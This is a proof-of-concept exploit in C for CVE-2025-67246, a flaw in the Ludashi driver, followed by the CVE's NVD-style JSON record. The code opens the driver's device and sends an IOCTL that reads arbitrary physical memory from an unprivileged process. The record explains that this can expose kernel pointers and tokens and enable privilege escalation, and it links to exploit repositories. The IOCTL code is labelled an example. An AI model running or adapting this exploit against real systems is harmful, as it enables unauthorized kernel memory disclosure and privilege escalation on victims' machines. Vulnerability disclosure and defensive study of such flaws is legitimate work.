CVE-2025-67246

/* CVE-2025-67246 PoC - Ludashi Driver Local Privilege Escalation This PoC demonstrates reading arbitrary physical memory via Ludashi driver. Compile: gcc -o cve_poc cve_poc.c -ladvapi32 Author: CVE-Publication */ #include <windows.h> #include <stdio.h> #include <stdint.h> #define LUDASHI_DEVICE_NAME "\\\\.\\LudashiDevice" #define IOCTL_READ_PHYSICAL_MEMORY 0x9C402400 // Example IOCTL code typedef struct _PHYSICAL_MEMORY_REQUEST { uint64_t PhysicalAddress; uint32_t Size; uint8_t Buffer[1]; } PHYSICAL_MEMORY_REQUEST, *PPHYSICAL_MEMORY_REQUEST; int main() { HANDLE hDevice; DWORD bytesReturned = 0; uint8_t readBuffer[0x1000]; PHYSICAL_MEMORY_REQUEST request; BOOL success; printf("[*] CVE-2025-67246 PoC - Ludashi Driver Physical Memory Read\n"); printf("[*] Opening Ludashi device...\n"); hDevice = CreateFileA( LUDASHI_DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open device. Error: %lu\n", GetLastError()); return 1; } printf("[+] Device opened successfully.\n"); // Read from physical address 0x1000 (arbitrary example) request.PhysicalAddress = 0x1000; request.Size = 0x100; printf("[*] Sending IOCTL request to read physical address: 0x%llx\n", request.PhysicalAddress); success = DeviceIoControl( hDevice, IOCTL_READ_PHYSICAL_MEMORY, &request, sizeof(request), readBuffer, sizeof(readBuffer), &bytesReturned, NULL ); if (success && bytesReturned > 0) { printf("[+] Successfully read %lu bytes from physical memory!\n", bytesReturned); printf("[*] First 32 bytes of data:\n"); for (int i = 0; i < 32 && i < bytesReturned; i++) { printf("%02X ", readBuffer[i]); if ((i + 1) % 16 == 0) printf("\n"); } printf("\n"); } else { printf("[-] Failed to read physical memory. Error: %lu\n", GetLastError()); } CloseHandle(hDevice); return 0; }

{"cve": {"id": "CVE-2025-67246", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:12.450", "lastModified": "2026-04-14T15:16:25.140", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A local information disclosure vulnerability exists in the Ludashi driver before 5.1025 due to a lack of access control in the IOCTL handler. This driver exposes a device interface accessible to a normal user and handles attacker-controlled structures containing the lower 4GB of physical addresses. The handler maps arbitrary physical memory via MmMapIoSpace and copies data back to user mode without verifying the caller's privileges or the target address range. This allows unprivileged users to read arbitrary physical memory, potentially exposing kernel data structures, kernel pointers, security tokens, and other sensitive information. This vulnerability can be further exploited to bypass the Kernel Address Space Layout Rules (KASLR) and achieve local privilege escalation."}, {"lang": "es", "value": "Una vulnerabilidad de revelación de información local existe en el controlador Ludashi anterior a la versión 5.1025 debido a una falta de control de acceso en el controlador IOCTL. Este controlador expone una interfaz de dispositivo accesible para un usuario normal y maneja estructuras controladas por el atacante que contienen los 4 GB inferiores de direcciones físicas. El controlador mapea memoria física arbitraria a través de MmMapIoSpace y copia datos de vuelta al modo de usuario sin verificar los privilegios del llamador o el rango de direcciones objetivo. Esto permite a usuarios sin privilegios leer memoria física arbitraria, exponiendo potencialmente estructuras de datos del kernel, punteros del kernel, tokens de seguridad y otra información sensible. Esta vulnerabilidad puede ser explotada aún más para eludir las Reglas de Diseño del Espacio de Direcciones del Kernel (KASLR) y lograr una escalada de privilegios local."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}, {"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ludashi:ludashi_driver:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.1025", "matchCriteriaId": "63FA880E-9340-4A37-909B-FE3DFB2413AB"}]}]}], "references": [{"url": "http://ludashi.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/CDipper/CVE-2025-67246", "source": "[email protected]"}, {"url": "https://github.com/CDipper/CVE-Publication", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}